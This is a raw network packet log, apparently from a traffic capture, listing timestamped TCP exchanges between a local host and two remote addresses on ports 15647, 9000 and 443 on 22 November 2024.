                                                                                                          Nov 22, 2024 15:49:37.697314978 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:37.716531992 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.735080004 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.786708117 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:37.788985014 CET4434990113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.789649010 CET49901443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:37.789688110 CET4434990113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.790096998 CET49901443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:37.790110111 CET4434990113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.857335091 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.857459068 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:37.871174097 CET4434989913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.874224901 CET4434989913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.874346018 CET49899443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:37.874444008 CET49899443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:37.874444008 CET49899443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:37.874491930 CET4434989913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.874520063 CET4434989913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.876800060 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:37.876894951 CET4434990513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:37.877090931 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:37.877156019 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:37.877173901 CET4434990513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.003657103 CET4434990013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.006807089 CET4434990013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.006921053 CET4434990013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.006999969 CET49900443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.007059097 CET49900443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.007059097 CET49900443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.007105112 CET49900443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.007138014 CET4434990013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.009660006 CET49906443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.009752989 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.009855986 CET49906443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.009954929 CET49906443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.009974003 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.018099070 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.018207073 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.178495884 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.219275951 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.219413042 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.233561993 CET4434990113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.236397982 CET4434990113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.236560106 CET49901443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.267204046 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.339153051 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.370254993 CET49901443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.370290995 CET4434990113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.370306969 CET49901443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.370312929 CET4434990113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.374552965 CET49907443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.374670982 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.374747038 CET49907443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.374883890 CET49907443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.374932051 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.380413055 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.429374933 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.429449081 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.542112112 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.549197912 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.562915087 CET90004990445.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.562958002 CET90004990445.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.563148975 CET499049000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.569425106 CET499049000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.586724043 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.687154055 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.689014912 CET90004990445.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.697487116 CET499089000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.729168892 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.730401039 CET49902443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.730437994 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.730952024 CET49902443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.730961084 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.743344069 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.782890081 CET4434990313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.788712025 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.807638884 CET49903443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.807668924 CET4434990313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.817238092 CET90004990845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.817423105 CET499089000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.817595959 CET499089000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:38.826819897 CET49903443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:38.826832056 CET4434990313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.848963022 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.937274933 CET90004990845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:38.986469030 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.027889013 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.055036068 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.175937891 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.176110983 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.205446959 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.255532026 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.256210089 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.256309032 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.256376028 CET49902443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.256424904 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.256546974 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.256597996 CET49902443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.323865891 CET49902443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.323867083 CET49902443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.323945045 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.323977947 CET4434990213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.338238955 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.338318110 CET4434990913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.338395119 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.338908911 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.338932991 CET4434990913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.375216007 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.375257969 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.375485897 CET4434990313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.375650883 CET4434990313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.375710964 CET49903443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.405746937 CET49903443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.405778885 CET4434990313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.405790091 CET49903443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.405796051 CET4434990313.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.410135984 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.410166025 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.410219908 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.410406113 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.410423994 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.492485046 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.492558956 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.501837015 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.602580070 CET4434990513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.603295088 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.603373051 CET4434990513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.603959084 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.603975058 CET4434990513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.618789911 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.618843079 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.693538904 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.738699913 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.738771915 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.769440889 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.770046949 CET49906443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.770121098 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.770392895 CET49906443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:39.770411015 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.820210934 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.820339918 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.858568907 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.938426971 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:39.938688993 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:39.940392017 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.037271976 CET4434990513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.040388107 CET4434990513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.040575027 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.040575027 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.040575981 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.043251038 CET49911443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.043370008 CET4434991113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.043454885 CET49911443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.043612957 CET49911443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.043637991 CET4434991113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.059467077 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.059669018 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.059814930 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.094204903 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.094831944 CET49907443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.094872952 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.095191956 CET49907443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.095204115 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.099165916 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.174752951 CET90004990845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.174886942 CET90004990845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.174983025 CET499089000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.174983025 CET499089000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.208112001 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.211292982 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.213079929 CET49906443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.213131905 CET49906443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.213161945 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.213176012 CET49906443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.213182926 CET4434990613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.216048956 CET49912443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.216094017 CET4434991213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.216150045 CET49912443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.216289997 CET49912443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.216300964 CET4434991213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.218713045 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.219171047 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.255506039 CET49905443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.255578041 CET4434990513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.260907888 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.287276030 CET499139000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.294588089 CET90004990845.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.302457094 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.302504063 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.302618027 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.381316900 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.382761002 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.409284115 CET90004991345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.411351919 CET499139000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.411452055 CET499139000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.424011946 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.461818933 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.463233948 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.507524014 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.507582903 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.534044981 CET90004991345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.535757065 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.540504932 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.540586948 CET49907443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.540689945 CET49907443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.540689945 CET49907443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.540734053 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.540760040 CET4434990713.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.541987896 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.543309927 CET49914443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.543360949 CET4434991413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.543448925 CET49914443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.543590069 CET49914443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:40.543598890 CET4434991413.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.583534956 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.629400969 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.630358934 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.630541086 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.708786964 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.711302996 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.750335932 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.750397921 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.786427021 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.833534956 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.870563030 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.871277094 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:40.950690985 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:40.951195955 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.032356024 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.032651901 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.113368988 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.113667965 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.134893894 CET4434990913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.135545015 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.135581017 CET4434990913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.135902882 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.135919094 CET4434990913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.152266979 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.152352095 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.152434111 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.192923069 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.217683077 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.218137980 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.218173981 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.218730927 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.218735933 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.233520985 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.233620882 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.273689985 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.353542089 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.353617907 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.476221085 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.476460934 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.579195976 CET4434990913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.582894087 CET4434990913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.583062887 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.583062887 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.583062887 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.585531950 CET49915443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.585634947 CET4434991513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.585731983 CET49915443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.585880041 CET49915443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.585905075 CET4434991513.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.598674059 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.598809958 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.664741039 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.667934895 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.668004990 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.668008089 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.668210030 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.668232918 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.668253899 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.668265104 CET49910443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.668271065 CET4434991013.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.670835018 CET49916443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.670881987 CET4434991613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.670954943 CET49916443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.671086073 CET49916443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.671101093 CET4434991613.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.761245966 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.761331081 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.766604900 CET4434991113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.767121077 CET49911443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.767167091 CET4434991113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.767452955 CET49911443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.767462969 CET4434991113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.797703981 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.799586058 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.799772978 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.803379059 CET4434991213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.803824902 CET49912443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.803868055 CET4434991213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.804256916 CET49912443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.804263115 CET4434991213.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.818551064 CET90004991345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.818666935 CET90004991345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.818733931 CET499139000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.852219105 CET499139000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.881050110 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.881294966 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.896229029 CET49909443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:41.896277905 CET4434990913.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.923249006 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.963071108 CET499179000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:41.972039938 CET90004991345.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:41.974163055 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:42.000969887 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:42.001027107 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:42.082359076 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:42.082492113 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:42.082617044 CET90004991745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:42.082695007 CET499179000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:42.121330976 CET499179000192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:42.121506929 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:42.199882984 CET4434991113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:42.200005054 CET4434991113.107.246.63192.168.2.7
                                                                                                          Nov 22, 2024 15:49:42.200196028 CET49911443192.168.2.713.107.246.63
                                                                                                          Nov 22, 2024 15:49:42.202212095 CET156474978745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:42.202285051 CET4978715647192.168.2.745.141.87.55
                                                                                                          Nov 22, 2024 15:49:42.242234945 CET90004991745.141.87.55192.168.2.7
                                                                                                          Nov 22, 2024 15:49:42.248646021 CET4434991213.107.246.63192.168.2.7
